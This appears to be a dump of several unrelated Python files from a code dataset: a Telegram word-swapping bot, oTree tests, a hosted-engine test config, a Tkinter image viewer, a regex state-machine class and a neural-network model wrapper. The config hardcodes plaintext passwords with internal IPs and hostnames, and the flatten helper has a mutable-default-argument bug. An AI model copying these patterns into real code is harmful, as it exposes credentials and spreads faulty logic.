if factorCounts[j] == factorization[factors[j]] + 1:
if j == len(factorCounts) - 1:
run = False
break
else:
factorCounts[j] = 0;
factorCounts[j + 1] += 1
return divisors
def mergeSort(array):
if len(array) <= 1:
return array[:]
else:
mid = len(array) // 2
left = mergeSort(array[:mid])
right = mergeSort(array[mid:])
result = []
while len(left) > 0 and len(right) > 0:
if left[0] < right[0]:
result.append(left.pop(0))
else:
result.append(right.pop(0))
if len(left) > 0:
result.extend(left)
elif len(right) > 0:
result.extend(right)
return result
| [
"bobrubbens@gmail.com"
] | bobrubbens@gmail.com |
42e42adb39702f2462200f2fd219c3c4258675db | c5d2e624675fea0ce3bf5f8c84e47bb0cae0c412 | /hw_3/bot.py | 609054fc70233019770b085ff26ce1a182898d40 | [] | no_license | tanyashar/hse-2.2 | 4afa79197baa28aa4496570ac2d62ad150dd56b6 | 66c318cd350c56099101a316a24d144efd62dc8f | refs/heads/master | 2021-06-19T06:05:10.014209 | 2017-06-20T23:50:47 | 2017-06-20T23:50:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,612 | py | # -*- coding: utf-8 -*-
import flask
import telebot
import conf
import json
import random
import re
import pymorphy2
from pymorphy2 import MorphAnalyzer
morph = MorphAnalyzer()
def find_words(text):
regexp = re.compile('[a-zA-Z0-9-]+', flags = re.U | re.DOTALL)
lst = regexp.findall(text)
return lst
def find_words_rus(text):
regexp = re.compile('[^а-яА-Я0-9-]+', flags = re.U | re.DOTALL)
lst = regexp.findall(text)
return lst
def make_text(text):
lst = json.load(open('/home/tanyashar/mysite/lemmas.json', 'r', encoding='utf-8'))
ct = 0
if len(text) != 0:
for i in range(len(text)-1,0,-1):
if text[i] != ' ':
break
else:
ct += 1
text = text[0:len(text)-ct]
s = text.split(' ')
ss=[]
for i in s:
symb = find_words_rus(i)
if len(symb)!=0:
if len(i)-len(symb[0]) != 0:
ss.append(i[0:len(i)-len(symb[0])])
ss.append(symb[0])
else:
ss.append(i)
l = ['NPRO', 'PREP', 'CONJ', 'PRCL']
#чтобы сохранить согласование, меняем любые части речи, кроме местоимений-существительных, предлогов, союзов и частиц
final_text=''
capital=0
for i in ss:
if not ('а'<=i[0]<='я' or 'А'<=i[0]<='Я'):
if i[0]=='-':
final_text += ' '
final_text += i
continue
capital = 0
if 'А'<=i[0]<='Я':
capital = 1
word = morph.parse(i)[0]
if word.tag.POS not in l:
new_word = morph.parse(random.choice(lst))[0]
while word.normalized.tag != new_word.normalized.tag:
new_word = morph.parse(random.choice(lst))[0]
forms = set(find_words(str(word.tag))[1:])
ft = new_word.inflect(forms).word
if 'Name' in forms or 'Geox' in forms or 'Surn' in forms or 'Patr' in forms or 'Orgn' in forms or 'Trad' in forms:
ft = ft[0].upper() + ft[1:]
if 'Abbr' in forms:
ft = ft.upper()
else:
ft = word.word
if capital == 1:
ft = ft[0].upper() + ft[1:]
if len(final_text)!=0 and final_text[len(final_text)-1]!=' ':
final_text += ' '
final_text += ft
return final_text
WEBHOOK_URL_BASE = "https://{}:{}".format(conf.WEBHOOK_HOST, conf.WEBHOOK_PORT)
WEBHOOK_URL_PATH = "/{}/".format(conf.TOKEN)
bot = telebot.TeleBot(conf.TOKEN, threaded=False)
bot.remove_webhook()
bot.set_webhook(url=WEBHOOK_URL_BASE+WEBHOOK_URL_PATH)
app = flask.Flask(__name__)
@bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
bot.send_message(message.chat.id, "Здравствуйте! Это бот, который будет вас передразнивать.")
@bot.message_handler(func=lambda m: True)
def send_len(message):
final_text = make_text(message.text)
bot.send_message(message.chat.id, final_text)
@app.route('/', methods=['GET', 'HEAD'])
def index():
return 'check OK'
@app.route(WEBHOOK_URL_PATH, methods=['POST'])
def webhook():
if flask.request.headers.get('content-type') == 'application/json':
json_string = flask.request.get_data().decode('utf-8')
update = telebot.types.Update.de_json(json_string)
bot.process_new_updates([update])
return ''
else:
flask.abort(403)
| [
"noreply@github.com"
] | tanyashar.noreply@github.com |
306fd59ef703a1513986c2b953cf95121906f645 | 7149126b143a87f15b125f02c6293a1588c14d9c | /0_otree_app/bret/tests.py | 972b242c0a62dc0602905772d3bac833b012e80b | [
"MIT"
] | permissive | victorvanpelt/control_asymmetry | f23370df1c02b56320943ee1b6bc52212b1198ff | 819a9523ab30a7eb1f91ff0dad11e607569b3a9e | refs/heads/master | 2023-04-17T09:50:03.690226 | 2021-05-04T09:32:07 | 2021-05-04T09:32:07 | 237,804,011 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | # -*- coding: utf-8 -*-
from __future__ import division
import random
from otree.common import Currency as c, currency_range
from . import pages
from ._builtin import Bot
from .models import Constants
class PlayerBot(Bot):
cases = ['always_bomb', 'never_bomb']
def play_round(self):
if Constants.instructions and self.player.round_number == 1:
yield (pages.Instructions, {'accept_conditions': True})
boxes_collected = 50
yield (
pages.Decision,
{
'bomb_row': 1, 'bomb_col': 1, 'boxes_collected': boxes_collected,
'bomb': 1 if self.case == 'always_bomb' else 0
}
)
expected_round_result = 0 if self.case == 'always_bomb' else Constants.box_value * boxes_collected
assert self.player.round_result == expected_round_result
if Constants.results and self.player.round_number == Constants.num_rounds:
# 1 round is chosen randomly
assert self.participant.vars['bret_payoff'] == expected_round_result
yield pages.Results
| [
"v.f.j.vanpelt@tilburguniversity.edu"
] | v.f.j.vanpelt@tilburguniversity.edu |
81782888a237836b72cab0f463e135921685cf2d | 067e7023fc67b0aeb8ab3ab498be0dcf3b7ee93e | /cases/cases_info/he_deployment.py | 6f5c49a48b7acb4351eb66174e4795dbebe1081b | [] | no_license | kimettog/cockpit-auto | a054d943ee1e9f026f0efe90723a013f4a47ba3b | 1028cc39fc3dec135be1eef20d2ea8c92ea2132b | refs/heads/master | 2021-09-07T18:40:51.927489 | 2018-02-27T12:11:54 | 2018-02-27T12:11:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,342 | py | # test_hosted_engine_deployment
from collections import OrderedDict
cases_t = (
('RHEVM-23815', 'check_he_otopi_install'),
('RHEVM-24594', 'check_he_hint'),
('RHEVM-23817', 'check_engine_status'),
('RHEVM-23819', 'check_vm_status'),
('RHEVM-23832', 'check_no_large_messages'),
('RHEVM-23833', 'check_no_password_saved'),
('RHEVM-23816', 'check_additional_host'),
('RHEVM-23826', 'check_put_local_maintenance'),
('RHEVM-23829', 'check_migrate_he'),
('RHEVM-23828', 'check_put_global_maintenance'),
('RHEVM-23827', 'check_remove_from_maintenance'),
('RHEVM-25065', 'check_he_clean'),
('RHEVM-23834', 'check_he_redeploy')
)
cases = OrderedDict(cases_t)
config = {
'rhvm_appliance_path': 'http://10.66.10.22:8090/rhevm-appliance/',
'storage_type': 'nfs',
'nfs_ip': '10.66.148.11',
'nfs_password': 'redhat',
'he_install_nfs': '/home/jiawu/nfs3',
'he_data_nfs': '/home/jiawu/nfs4',
'sd_name': 'heauto-sd',
'he_vm_mac': '52:54:00:5e:8e:c7',
'he_vm_fqdn': 'rhevh-hostedengine-vm-04.lab.eng.pek2.redhat.com',
'he_vm_domain': 'lab.eng.pek2.redhat.com',
'he_vm_ip': '10.73.73.100',
'he_vm_password': 'redhat',
'engine_password': 'password',
'second_host': '10.73.73.15',
'second_password': 'redhat',
'second_vm_fqdn': 'cockpit-vm',
}
| [
"yzhao@redhat.com"
] | yzhao@redhat.com |
a0ea550899adfc525da0d29fa0b2b9edb068c27d | 32e28c066dba6311015ae9ad318ec707f96dc5d9 | /Datesplit.py | 67096c74027e924747819a0d2d73f2a3356f83de | [] | no_license | Tanvippatel/pythondatascrape | c51ffe11e7b592f6058d3a1fb70509e85f960c80 | ec10ecafb2929a2e8c9b6a95a107ba8837a4bd6d | refs/heads/main | 2023-05-15T02:18:05.793862 | 2021-06-14T05:29:19 | 2021-06-14T05:29:19 | 375,595,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py |
import re
str = 'Date: 2004 - 2010'
chunks = re.split('[:-]',str)
for chunk in chunks:
print(chunk)
| [
"noreply@github.com"
] | Tanvippatel.noreply@github.com |
5850af25d4b360896d8e3d1ca94803dd606025ac | af6e713b0830d99f826b50da67a61c3771ce4fd2 | /Image_viewer_app.py | 34734a6ad7ba12a03b1d34f790da6d9cec3369ec | [] | no_license | JakeMcKean-code/Image-Viewer | 0b3edb1ec8a81321468f8061b56337eb87cd6da3 | 037fff5f09d799c232a15dfe7feae7cb3bdc6ea9 | refs/heads/main | 2023-08-23T16:36:36.019160 | 2021-09-26T19:52:08 | 2021-09-26T19:52:08 | 410,647,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,774 | py | """
Created on Sunday Sep 26 17:32:16 2021
@author: Jake McKean
"""
# --------------------------------------------------------------
# Use the os package to list all the files in my images directory and then
# append them all to a list
from os.path import join
import os
import glob
from PIL import ImageTk, ImageFile
import PIL.Image
from tkinter import *
from tkinter import Label
from tkinter import Button
from tkinter import Tk
from tkinter.filedialog import askdirectory
from tkinter import messagebox
# --------------------------------------------------------------
class window():
def __init__(self, master):
self.master = master
master.geometry("1100x750")
master.title("Image Viewer")
self.image_list = []
self.files = []
self.image_num = 0
master.configure(bg='#355C7D')
# First screen of the application
def open_directory_screen(self):
self.path_to_directory = StringVar()
self.frame = LabelFrame(self.master, padx = 20, pady = 10) # padding here controls the padding inside the frame
self.frame.configure(bg='#6C5B7B')
self.frame.grid(row = 2, column = 1, padx = 470, pady=250) # padding here controls how sunken in the frame is in the window
self.Set_button = Button(self.frame, text = "Press to view images", command = self.open_directory)
self.Set_button.grid(row = 6, column = 0, columnspan = 3, pady=20)
self.File_button = Button(self.frame, text = "Choose image directory", command = self.get_directory)
self.File_button.grid(row = 3, column = 0, pady = 20)
return
def get_directory(self):
path = askdirectory()
self.path_to_directory.set(path)
return
def open_directory(self):
self.SAVE_PATH = self.path_to_directory.get()
self.remove_window(self.frame)
return
def forward(self, image_number):
self.back_button = Button(root, text = "<<", command = lambda: self.backward(self.image_num))
self.back_button.grid(row = 1, column = 1)
# delete image and redefine the label with the new image
if(image_number < (len(self.image_list)-1)):
self.my_label.grid_forget()
self.my_label = Label(image = self.image_list[self.image_num+1], padx = 10, pady = 20)
self.image_num += 1
self.my_label.grid(row = 0, column = 1, columnspan = 3)
if(self.image_num == len(self.image_list)-1):
self.forward_button = Button(root, text = ">>", state = DISABLED)
self.forward_button.grid(row = 1, column = 3)
# Text for status bar
status_text = "Image " + str(self.image_num + 1) + " of " + str(len(self.image_list))
self.status = Label(root,text = status_text, bd = 1, relief = SUNKEN)
self.status.grid(row = 2, column = 3)
return
def backward(self, image_number):
# delete image and redefine the label with the new image
if(self.image_num ==1):
self.back_button = Button(root, text = "<<", state = DISABLED)
self.back_button.grid(row = 1, column = 1)
if(image_number != 0):
self.forward_button = Button(root, text = ">>", command = lambda: self.forward(self.image_num))
self.forward_button.grid(row = 1, column = 3)
self.my_label.grid_forget()
self.image_num -= 1
self.my_label = Label(image = self.image_list[self.image_num-1], padx = 10, pady = 20)
self.my_label.grid(row = 0, column = 1, columnspan = 3)
# Text or status bar
status_text = "Image " + str(self.image_num+1) + " of " + str(len(self.image_list))
self.status = Label(root,text = status_text, bd = 1, relief = SUNKEN)
self.status.grid(row = 2, column = 3)
return
# Second screen of the application
def second_frame(self):
# element in the file
for filename in glob.glob(os.path.join(self.SAVE_PATH,"*.png")):
self.files.append(filename)
for j in self.files:
self.image_list.append(ImageTk.PhotoImage(PIL.Image.open(join(self.SAVE_PATH,j)).resize((1000,600))))
self.my_label = Label(image = self.image_list[self.image_num], padx = 10, pady = 20)
self.my_label.grid(row = 0, column = 1, columnspan = 3)
# Create the back button
self.back_button = Button(root, text = "<<", command = lambda: self.backward(self.image_num))
if(self.image_num ==0):
self.back_button = Button(root, text = "<<", state = DISABLED)
self.back_button.grid(row = 1, column = 1)
# Creating an exit button
self.quit_button = Button(root, text = "press to exit", command = self.master.quit)
# Creating the forward button
self.forward_button = Button(root, text = ">>", command = lambda: self.forward(self.image_num + 1))
self.back_button.grid(row = 1, column = 1)
self.quit_button.grid(row = 1, column = 2)
self.forward_button.grid(row = 1, column = 3, pady=10)
# Create a status label
status_text = "Image " + str(self.image_num+1) + " of " + str(len(self.image_list))
self.status = Label(root,text = status_text, bd = 1, relief = SUNKEN)
self.status.grid(row = 2, column = 3)
return
def remove_window(self, frame, first_time = True):
frame.destroy()
if(first_time == True):
self.Set_button.destroy()
self.second_frame()
return
# --------------------------------------------------------------
root = Tk()
gui = window(root)
gui.open_directory_screen()
root.mainloop()
root.mainloop()
| [
"noreply@github.com"
] | JakeMcKean-code.noreply@github.com |
d87523e61d9d27689d257f0466bccb56af247722 | 9857ba3ab06755d6c559f5a27662945f260b9ece | /nfsm.py | 35a4dfafbcaa5b37321ecd08a2f6c67c8c376034 | [] | no_license | brownan/regescrossword | dd91c80be40a8f151ad6855b7535a8945aec0c38 | 53003074df87d293fed84a73081853004d071f3d | refs/heads/master | 2020-08-27T04:30:56.072995 | 2013-03-12T23:49:07 | 2013-03-12T23:49:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,599 | py | #!/bin/env python3
from copy import deepcopy
from itertools import product
from functools import reduce
from operator import add
import io
"""
nfsm.py - Nondeterministic finite state machine.
"""
class NFSM:
"""This class implements a non-deterministic finite state machine that
matches a string of fixed, finite length. It is initialized with a string
representing a regular expression, and an alphabet.
Initialized objects have an internal state of "slots". Each slot represents
a single character in the string to match, but each slot object holds a set
of possible characters from the alphabet that could possibly belong in the
slot given the constraints.
This doesn't support full regular expression syntax. Non-exhaustive list of
things that are not supported and will result in undefined behavior:
* Only a single level of parenthesis allowed. No nesting.
* A reference to a group that may or may not be matched under all
circumstances e.g. (A)?\1
* A group that is quantified or repeated. e.g. (A)+\1
* A reference to a forward group or a reference to a group from within the
group. e.g. \1(A) (A\2)
(I'm not sure what would happen in a more compliant regex implementation
anyways)
"""
    def __init__(self, regex, length, alphabet):
        """Compile `regex` into slot chains for strings of exactly `length`
        characters drawn from `alphabet`.

        :param regex: the (restricted) regular expression to compile
        :param length: exact length of the strings this object will match
        :param alphabet: iterable of the characters strings may contain
        """
        # The finite state machine is represented as a number of "chains". Each
        # chain is a list of sets. Each set is a set of characters that could
        # go in that slot. For example, the regex 'AB+[^B]*' of length 4 over the
        # alphabet ABC would be represented with
        # [
        #  [set('A'), set('B'), set('B'), set('B')],
        #  [set('A'), set('B'), set('B'), set('AC')],
        #  [set('A'), set('B'), set('AC'), set('AC')],
        # ]
        # When constraints are added, the constraint set is intersected with
        # that index of each chain. If any chain has an empty set, it is
        # removed from consideration.
        self.chains = []
        self.length = length
        self.alphabet = frozenset(alphabet)
        unflattened_chains = list(self._parse_regex_part(regex))
        #print("{0!r} -> {1}".format(regex, unflattened_chains))
        # Dereference backreferences and flatten chains
        for chain in unflattened_chains:
            # Flatten and dereference this chain, then add it to self.chains
            groups = []
            flattened = []
            for item in chain:
                if isinstance(item, list):
                    # A nested list is a group definition: splice its slots
                    # into the flat chain and remember it for backreferences.
                    flattened.extend(item)
                    groups.append(item)
                else:
                    flattened.append(item)
            dereferenced = []
            for item in flattened:
                if isinstance(item, int):
                    # An integer is a backreference: splice in the very same
                    # set objects as the referenced group. The aliasing is
                    # intentional -- constrain_slot's in-place "&=" then
                    # constrains the group and its reference together.
                    dereferenced.extend(groups[item])
                else:
                    dereferenced.append(item)
            self.chains.append(dereferenced)
        #print("{0!r} -> {1}".format(regex, self.chains))
        # and, since we are given the length of the string we match,
        # discard chains of any other length
        self.chains = [chain for chain in self.chains if len(chain) == self.length]
        #print("{0!r} -> {1}".format(regex, self.chains))
    def _parse_regex_part(self, regex):
        """This recursive method takes a regex and parses it, yielding a series
        of chain lists that together match this regex.

        Each chain returned is a list. Each item in the list may be one of
        three things:
        * A set containing the elements from the alphabet which this slot may
          contain
        * An integer referring to a group number from a group previously
          defined
        * A list of one or more of the above denoting a group definition

        NOTE(review): relies on `reduce`, `add`, and `product` being in scope
        (presumably imported from functools/operator/itertools at the top of
        the file, which is not visible here -- confirm).
        """
        if not regex:
            # Base case, an empty chain
            yield []
            return
        # Take care of union'd expressions here, first: split on any
        # top-level "|" and recurse on each alternative independently.
        paren_level = 0
        index = 0
        while index < len(regex):
            c = regex[index]
            if c == "(":
                paren_level += 1
            elif c == ")":
                paren_level -= 1
            if c == "|" and paren_level == 0:
                # Here's where a yield from statement added in python 3.3 would
                # come in handy
                # Left side
                for chain in self._parse_regex_part(regex[:index]):
                    yield chain
                # Right side
                for chain in self._parse_regex_part(regex[index+1:]):
                    yield chain
                return
            index += 1
        if paren_level != 0:
            raise ValueError("Unbalanced parentheses! {0!r}".format(regex))
        # From this point on, we don't have to worry about unioned (|)
        # expressions. Just try and handle one thing.
        c = regex[0]
        end_index = 0
        group = False
        if c in self.alphabet:
            # Literal character: one slot holding exactly that character.
            chains = [[set(c)]]
        elif c == ".":
            # Wildcard: one slot that may hold any alphabet character.
            chains = [[set(self.alphabet)]]
        elif c == "[":
            # Character class, optionally negated with a leading "^".
            end_index = regex.find("]")
            if regex[1] == "^":
                chains = [[set(self.alphabet - set(regex[2:end_index]))]]
            else:
                chains = [[set(regex[1:end_index])]]
        elif c == "(":
            # XXX Assume no nested parens for now
            end_index = regex.find(")")
            chains = list(self._parse_regex_part(regex[1:end_index]))
            group = True
        elif c == "\\":
            # A group reference (single digit, 1-based in the regex text)
            end_index = 1
            matchindex = int(regex[1])-1
            # instead of a set or a chain, emit a chain with one integer, which
            # will be dereferenced later
            chains = [[matchindex]]
        else:
            raise ValueError("Found char {0!r} not in the alphabet or recognized regex special char".format(c))
        # At this point, the chains list is a list of chains (a chain is a list
        # of sets) representing the possible matches of the regex up to
        # end_index. This may be quantified, so take care of that
        if len(regex) > end_index+1:
            quantifier = regex[end_index+1]
            if quantifier == "*":
                # Kleene star. any combination of `chains` can appear zero or
                # more times
                for chain2 in self._parse_regex_part(regex[end_index+2:]):
                    for repeatnum in range(self.length+1):
                        # chains from above may have multiple chains, and if we
                        # are to repeat them we must take a cross product
                        # because the repeated values could be any of the
                        # possible chains.
                        for chain1 in (reduce(add, c, []) for c in product(chains, repeat=repeatnum)):
                            if len(chain1) + len(chain2) <= self.length: # it ain't getting any shorter
                                yield self._copy_chain(chain1) + self._copy_chain(chain2)
                return
            elif quantifier == "+":
                # Same as above but repeatnum starts at 1
                for chain2 in self._parse_regex_part(regex[end_index+2:]):
                    for repeatnum in range(1, self.length+1):
                        for chain1 in (reduce(add, c, []) for c in product(chains, repeat=repeatnum)):
                            if len(chain1) + len(chain2) <= self.length:
                                yield self._copy_chain(chain1) + self._copy_chain(chain2)
                return
            elif quantifier == "?":
                # Optional item: yield the continuation both without and with
                # one occurrence of this item.
                for chain2 in self._parse_regex_part(regex[end_index+2:]):
                    for chain1 in chains:
                        yield self._copy_chain(chain2)
                        yield self._copy_chain(chain1) + self._copy_chain(chain2)
                return
            # If the character was not one of the above, fall off this if
            # statement and continue below
        # If the code gets here, the handled item was not quantified
        # XXX Assumption: only unquantified parenthesized expressions can be
        # groups
        for chain2 in self._parse_regex_part(regex[end_index+1:]):
            for chain1 in chains:
                if group:
                    # the chains in the chains var are part of a group.
                    # enclose it in a list to mark it as a group. chains will
                    # be flattened and group references dereferenced later.
                    yield [self._copy_chain(chain1)] + self._copy_chain(chain2)
                else:
                    yield self._copy_chain(chain1) + self._copy_chain(chain2)
@staticmethod
def _copy_chain(chain, repeat=1):
"""Takes a chain and returns a copy of it, repeated the given number of
times
"""
# You may think this method could just be replaced with python's
# copy.deepcopy, but deepcopy will keep references to identical
# objects, copying the object just once, and we want to copy
# everything. In other words, this method also has the hidden but
# necessary effect of decoupling some set references in some chains.
if not isinstance(chain, list):
raise ValueError("Given item is not a chain. Chains are lists")
chaincopy = []
for _ in range(repeat):
for item in chain:
chaincopy.append(deepcopy(item))
return chaincopy
def constrain_slot(self, index, charset):
"""constrain_slot takes a slot index and a set of characters
indicating that slot, from some exteral source of knowledge, is one of
the given elements. This object is then updated and its own slots are
adjusted to be consistent with that data.
"""
charset = frozenset(charset)
newchains = []
for chain in self.chains:
chain[index] &= charset
if chain[index]:
newchains.append(chain)
self.chains = newchains
def peek_slot(self, index):
"""peek_slot takes a slot index, and returns the set of characters that
this object currently thinks are possible to go in that slot, according
to the regex and the constraints placed upon it.
"""
candidates = set()
for chain in self.chains:
candidates |= chain[index]
return candidates
def match(self, matchstr):
"""Takes a string and returns True or False if it matches this regex,
including the constraints previously placed on it with constrain_slot()
"""
if len(matchstr) != self.length:
return False
# The string needs to match at least one of the chains. We implement
# this as a series of constraints, but since we mutate the object we
# need to make a copy
newregex = self.copy()
for i, c in enumerate(matchstr):
newregex.constrain_slot(i, set(c))
return bool(newregex.chains)
def copy(self):
"""Makes a copy of this regex object, including any constraints already
applied
"""
newobj = self.__class__("", self.length, self.alphabet)
# The rest of this method could be implemented with deepcopy() and
# still function correctly, but deepcopy() runs quite a bit slower. The
# code below must make some assumptions that deepcopy() doesn't. I'm
# guessing it's probably that every item in the sets are immutable
# strings.
newobj.chains = []
for chain in self.chains:
# Copy each set, but we need to make sure to keep aliased
# references intact.
newchain = []
# maps the id() of old sets to the new copy of that set, so we can
# re-use it when we encounter the original again.
ids = {}
for oldset in chain:
if id(oldset) in ids:
newchain.append(ids[id(oldset)])
else:
newset = set(oldset)
newchain.append(newset)
ids[id(oldset)] = newset
newobj.chains.append(newchain)
return newobj
def __str__(self):
"""Return normalized string representing this regex object.
"""
out = []
for chain in self.chains:
chainstr = io.StringIO()
for slot in chain:
if slot == self.alphabet:
chainstr.write(".")
elif len(slot) > 3 and len(self.alphabet - slot) == 1:
# Missing one element
missing = (self.alphabet - slot).pop()
alphabet = "".join(sorted(self.alphabet))
i = alphabet.index(missing)
if i == 0:
chainstr.write("[{0}-{1}]".format(alphabet[1],alphabet[-1]))
elif i == len(alphabet)-1:
chainstr.write("[{0}-{1}]".format(alphabet[0],alphabet[-2]))
else:
chainstr.write("[{0}-{1}{2}-{3}]".format(alphabet[0],alphabet[i],alphabet[i+1],alphabet[-1]))
elif len(slot) == 1:
chainstr.write("".join(slot))
else:
chainstr.write("[{0}]".format("".join(sorted(slot))))
out.append(chainstr.getvalue())
return "|\n".join(out)
| [
"brownan@gmail.com"
] | brownan@gmail.com |
def my_flatten(list_of_lists, accumulator=None):
    """Recursively flatten arbitrarily nested lists/tuples into a flat list.

    Bug fix: the original used a mutable default argument
    (``accumulator=[]``), which Python evaluates once, so results from
    earlier calls leaked into later ones. ``None`` sentinel restores a
    fresh accumulator per call. Also uses ``isinstance`` so list/tuple
    subclasses are flattened as well.

    :param list_of_lists: the (possibly nested) sequence to flatten
    :param accumulator: optional list to append results to (used by the
        recursive calls; callers normally omit it)
    :return: the flat list of non-sequence elements, in traversal order
    """
    if accumulator is None:
        accumulator = []
    for elem in list_of_lists:
        if isinstance(elem, (list, tuple)):
            my_flatten(elem, accumulator)
        else:
            accumulator.append(elem)
    return accumulator
| [
"james@james-ThinkPad-T510.(none)"
] | james@james-ThinkPad-T510.(none) |
37eb09cc8939677e76d618fe0df7a6fed5a6fd42 | 1758d8b34f681f63e588e9896e2ca244bf605e57 | /src/models/model_imageNet.py | 8b359e8b74ca1107cbd75b7bb29e2545fb2676db | [
"Apache-2.0"
] | permissive | snudatalab/FALCON | 7098225eb4627c45744322f22b28b38c060810ae | d71fe1563d9baf2fc9e5f4b5dee4bedb8d55b643 | refs/heads/master | 2023-05-25T16:25:35.211886 | 2023-05-21T06:21:03 | 2023-05-21T06:21:03 | 205,502,133 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 12,822 | py | """
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License
.
FALCON: FAst and Lightweight CONvolution
Authors:
- Chun Quan (quanchun@snu.ac.kr)
- U Kang (ukang@snu.ac.kr)
- Data Mining Lab. at Seoul National University.
File: models/model_imageNet.py
- Contain source code for re-organize the structure of pre-trained model.
Version: 1.0
"""
import torch
import torch.nn as nn
from models.falcon import EHPdecompose
from utils.tucker import Tucker2DecomposedConv
from models.dsconv import DepthwiseSeparableConv
from models.mobileconvv2 import Block as Block_MobileConvV2
from models.shuffleunit import ShuffleUnit
from models.shuffleunitv2 import ShuffleUnitV2
from models.stconv_branch import StConv_branch
class VGGModel_imagenet(nn.Module):
    """
    Description: Re-organize the structure of a given VGG model so that its
    standard convolutions can later be replaced in place by compressed
    variants (FALCON units or StConv_branch units).
    """
    def __init__(self, model):
        """
        Initialize a given model.
        :param model: the given model; must expose `features` (conv stack)
                      and `classifier` (fully connected head)
        """
        super(VGGModel_imagenet, self).__init__()
        self.features = model.features
        self.classifier = model.classifier
    def forward(self, x):
        """Run forward propagation.
        Returns the tuple (logits, flattened feature vector)."""
        x1 = self.features(x)
        # Flatten per-sample feature maps before the classifier head.
        x1 = x1.view(x1.size(0), -1)
        x2 = self.classifier(x1)
        return x2, x1
    def falcon(self, init=True, rank=1, bn=False, relu=False):
        """
        Replace standard convolution by FALCON
        :param rank: rank of EHP
        :param init: whether initialize FALCON with EHP decomposition tensors
        :param bn: whether add batch normalization after FALCON
        :param relu: whether add ReLU function after FALCON
        """
        print('********** Compressing...... **********')
        for i in range(len(self.features)):
            if isinstance(self.features[i], nn.Conv2d):
                print(self.features[i])
                compress = EHPdecompose(self.features[i], rank, init, bn=bn, relu=relu)
                self.features[i] = compress
            if isinstance(self.features[i], nn.BatchNorm2d):
                # Re-create each BatchNorm on the same device; note this
                # resets its affine parameters and running statistics.
                device = self.features[i].weight.device
                self.features[i] = nn.BatchNorm2d(self.features[i].num_features).to(device)
    def stconv_branch(self, alpha=1):
        """
        Replace standard convolution by stconv_branch (vs shuffleunitv2)
        :param alpha: width multiplier
        """
        for i in range(len(self.features)):
            if isinstance(self.features[i], nn.Conv2d):
                # print(self.features[i])
                shape = self.features[i].weight.shape
                if shape[1] == 3:
                    # First conv (3 input channels = RGB): keep a plain conv,
                    # widen its output by alpha, and rebuild the BatchNorm
                    # assumed to sit directly after it.
                    self.features[i] = nn.Conv2d(3, int(self.features[i].out_channels * alpha), kernel_size=3, padding=1)
                    self.features[i+1] = nn.BatchNorm2d(self.features[i].out_channels)
                else:
                    compress = StConv_branch(int(self.features[i].in_channels * alpha),
                                             int(self.features[i].out_channels * alpha),
                                             stride=self.features[i].stride[0])
                    self.features[i] = compress
        layers = []
        # Drop BatchNorm/ReLU layers that directly follow an StConv_branch
        # (the branch module carries its own normalization/activation).
        for i in range(len(self.features)):
            if (isinstance(self.features[i], nn.BatchNorm2d) and isinstance(self.features[i - 1], StConv_branch)) \
                    or (isinstance(self.features[i], nn.ReLU) and isinstance(self.features[i - 2], StConv_branch)):
                pass
            else:
                layers.append(self.features[i])
        if alpha != 1:
            # Insert a 1x1 conv mapping the alpha-widened channel count back
            # to what the classifier expects; the /49 presumably accounts
            # for the 7x7 spatial size before flattening -- TODO confirm.
            layers.append(layers[-1])
            layers[-2] = nn.Conv2d(int(self.classifier[0].in_features * alpha / 49),
                                   int(self.classifier[0].in_features / 49),
                                   kernel_size=1,
                                   stride=1,
                                   padding=0)
        self.features = nn.Sequential(*layers)
    def falcon_branch(self, init=True):
        """
        Replace standard convolution in stconv_branch by falcon
        :param init: whether initialize falcon
        NOTE(review): accesses self.features.module, which implies the
        feature stack has been wrapped (e.g. in nn.DataParallel) before this
        method is called -- confirm against callers.
        """
        for i in range(len(self.features.module)):
            if isinstance(self.features.module[i], StConv_branch):
                self.features.module[i].falcon(init=init)
class BasicBlock_StConvBranch(nn.Module):
    """Residual basic block whose convolution stages are supplied modules
    (typically StConv_branch units).

    Computes relu(conv2(conv1(x)) + shortcut), where the shortcut is
    `downsample(x)` when a downsample module is given, else `x` itself.
    """
    def __init__(self, conv1, conv2, downsample=None):
        """Store the two convolution stages and the optional shortcut.

        :param conv1: first convolution stage of the block
        :param conv2: second convolution stage of the block
        :param downsample: optional module applied on the identity path
        """
        super(BasicBlock_StConvBranch, self).__init__()
        self.conv1 = conv1
        self.conv2 = conv2
        self.downsample = downsample
        self.relu = nn.ReLU(inplace=True)
    def forward(self, x):
        """Run forward propagation"""
        shortcut = x if self.downsample is None else self.downsample(x)
        out = self.conv2(self.conv1(x))
        out = out + shortcut
        return self.relu(out)
class ResNetModel_imagenet(nn.Module):
    """
    Description: Re-organize the structure of a given ResNet model so that
    the convolutions inside its basic blocks can later be replaced by
    compressed variants (FALCON units or StConv_branch units).
    """
    def __init__(self, model):
        """
        Initialize a given model.
        :param model: the given model (a torchvision-style ResNet exposing
                      conv1/bn1/relu/maxpool, layer1..layer4, avgpool, fc)
        """
        super(ResNetModel_imagenet, self).__init__()
        # Index layout of self.features:
        #   [0]     stem (conv1, bn1, relu, maxpool)
        #   [1]-[4] the four residual stages
        #   [5]     average pooling
        self.features = nn.Sequential(
            nn.Sequential(
                model.conv1,
                model.bn1,
                model.relu,
                model.maxpool
            ),
            model.layer1,
            model.layer2,
            model.layer3,
            model.layer4,
            model.avgpool
        )
        self.classifier = model.fc
    def forward(self, x):
        """Run forward propagation.
        Returns the tuple (logits, flattened feature vector)."""
        x1 = self.features(x)
        x1 = x1.view(x1.size(0), -1)
        x2 = self.classifier(x1)
        return x2, x1
